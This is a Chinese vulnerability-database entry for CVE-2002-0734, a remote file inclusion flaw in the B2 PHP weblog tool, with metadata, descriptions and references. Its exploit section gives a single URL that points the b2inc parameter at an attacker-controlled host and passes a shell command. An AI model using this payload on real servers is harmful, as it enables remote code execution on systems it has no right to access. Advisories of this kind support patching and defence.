B2 B2config.php远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106714 漏洞类型 未知
发布时间 2002-05-06 更新时间 2005-05-02
CVE编号 CVE-2002-0734 CNNVD-ID CNNVD-200208-125
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21436
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-125
|漏洞详情
B2是一款新闻/WEB记录工具,由PHP编写,允许管理员快速在Frontpage中张贴新闻,并允许浏览者交互,可使用于Linux和Unix操作系统下。B2中B2config.php脚本在处理引用变量上存在问题,可导致远程攻击者以B2进程的权限在目标系统上执行任意命令。在PHP脚本引用的变量实际不存在,因此,攻击者可以自己定义变量值,通过在自己控制的服务器上建立PHP脚本并嵌入相关命令,攻击者可以引用这个远程文件,导致攻击者以B2权限在目标服务器上执行任意命令。问题存在于/b2-include/b2edit.showposts.php中:*snippet*通过远程引用,就可以在目标系统上以B2进程的权限执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls
|参考资料

来源:BID
名称:4673
链接:http://www.securityfocus.com/bid/4673
来源:XF
名称:b2-b2inc-command-execution(9013)
链接:http://www.iss.net/security_center/static/9013.php
来源:BUGTRAQ
名称:20020506b2phpremotecommandexecution
链接:http://archives.neohapsis.com/archives/bugtraq/2002-05/0027.html
来源:cafelog.com
链接:http://cafelog.com/